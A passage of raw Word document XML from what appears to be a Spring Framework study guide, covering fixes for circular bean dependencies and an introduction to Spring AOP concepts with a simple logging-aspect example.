      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for circular references, as Spring can inject the dependencies after both beans are created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9038F3" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2006"/>
        </w:num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 xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@Lazy</w:t>
      </w:r>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotation to defer the initialization of one of the dependent beans, allowing Spring to break the cycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E576E1" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0E5CD9" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00C720CE" w:rsidRDefault="00A34736" w:rsidP="00C720CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C720CE">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Circular dependency in Spring occurs when two or more beans depend on each other, creating a loop that Spring cannot resolve during the bean initialization process. It can be resolved using setter injection, the @Lazy annotation, or by redesigning the beans to remove the circular reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0CB2C5" w14:textId="77777777" w:rsidR="00A34736" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00A3473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D2B9EA4">
          <v:rect id="_x0000_i2135" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="547F1718" w14:textId="275305B5" w:rsidR="00CD6436" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD6436">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>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color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0901804F" w14:textId="314366CA" w:rsidR="00CD6436" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD6436" w:rsidP="00CD6436">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="454" w:name="_Toc196307934"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Spring AOP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="454"/>
    </w:p>
    <w:p w14:paraId="2F298B78" w14:textId="77777777" w:rsidR="00CD6436" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD6436" w:rsidP="00CD6436">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FEB586C" w14:textId="77777777" w:rsidR="00CD6436" w:rsidRPr="00CE4B95" w:rsidRDefault="00CD6436" w:rsidP="00CD6436">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="455" w:name="_Toc196307935"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is AOP in Spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="455"/>
    </w:p>
    <w:p w14:paraId="54C9E42B" w14:textId="14F582E2" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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AOP (Aspect-Oriented Programming)</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring is a programming paradigm that allows the separation of cross-cutting concerns (aspects) from the core logic of the application. AOP allows developers to define common functionality (such as logging, transaction management, security, etc.) in one place and apply it across multiple components without modifying the actual code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60431AAA" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Concepts of AOP in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0962CBD2" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1940"/>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Aspect</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E31E585" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1940"/>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An aspect is a module that encapsulates a cross-cutting concern. It typically contains advice and can be applied to different parts of the application. For example, a logging aspect might contain methods to log information before or after a method is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3EFBED" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1940"/>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Join Point</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A53A06B" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1940"/>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A join point is a point during the execution of a program, such as method execution, where an aspect can be applied. In Spring AOP, the most common join points are method calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053E033D" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1940"/>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Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370EF0E2" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1940"/>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Advice is the action that is taken at a specific join point. It is the actual code that is executed when the aspect is applied. There are several types of advice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533BF102" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1940"/>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Before Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs before the method execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D99AA93" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1940"/>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After Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs after the method execution, regardless of the outcome.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B31A2DE" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1940"/>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After Returning Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs after the method returns successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A41F3D7" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1940"/>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After Throwing Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs if the method throws an exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F346D19" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1940"/>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Around Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Surrounds the method execution and can control whether the method executes or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794A4ACB" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1940"/>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Pointcut</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32245179" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1940"/>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A pointcut is an expression that matches certain join points. It defines </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the advice should be applied (e.g., which methods or classes). Pointcuts are often defined using annotations or expressions like execution(), within(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36564F06" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1940"/>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Weaving</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28225845" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1940"/>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Weaving is the process of applying aspects to the target objects. Spring AOP performs weaving at runtime, unlike other AOP frameworks like AspectJ, which can perform weaving at compile-time or load-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A126A8" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How AOP Works in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6954E1D5" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1941"/>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Define an Aspect</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You create an aspect that contains one or more advices (logic you want to apply) and a pointcut expression (where to apply it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78688A4F" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1941"/>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Apply Aspect to Target</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring’s AOP proxy applies the aspect to the target class based on the pointcut expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8EE20C" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1941"/>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Execute Advice</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When the target method is invoked, the corresponding advice runs at the specified join points.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D82CF2F" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Types of AOP in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E531C56" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1942"/>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Proxy-based AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4572D60D" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1942"/>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In Spring, AOP is usually implemented using </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JDK dynamic proxies</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CGLIB proxies</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. JDK proxies are used when the target object implements an interface, while CGLIB proxies are used for non-interface-based classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618A7D26" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1942"/>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Spring AOP uses </w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runtime proxies</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning that the aspect is applied dynamically when the method is called.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EFFF23" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1942"/>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AspectJ-based AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1B9D82" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1942"/>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AspectJ is a more powerful and flexible AOP framework that can provide compile-time and load-time weaving. Spring AOP is typically used with proxy-based AOP, but you can integrate Spring with AspectJ for more advanced features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20765C1F" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Example of AOP in Spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B8C735"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1. Define an Aspect (Advice &amp; Pointcut)</w:t>
      </w:r>
      <w:r w:rsidRPr="008045FC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF3411"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Aspect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703D34BC"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Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771CF1DA"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lastRenderedPageBreak/>
        <w:t>public class LoggingAspect {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C772538" w14:textId="77777777" w:rsidR="008F7FDE" w:rsidRPr="008045FC" w:rsidRDefault="008F7FDE" w:rsidP="008045FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DB93E8"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 Pointcut expression: matches all methods in the "service" package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC61ED3"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Before("execution(* com.example.service.*.*(..))")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E993BBA"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public void logBefore(JoinPoint joinPoint) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17951575"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System.out.println("Logging before method execution: " + joinPoint.getSignature());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D64D689"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w:t>
      </w:r>
    </w:p>
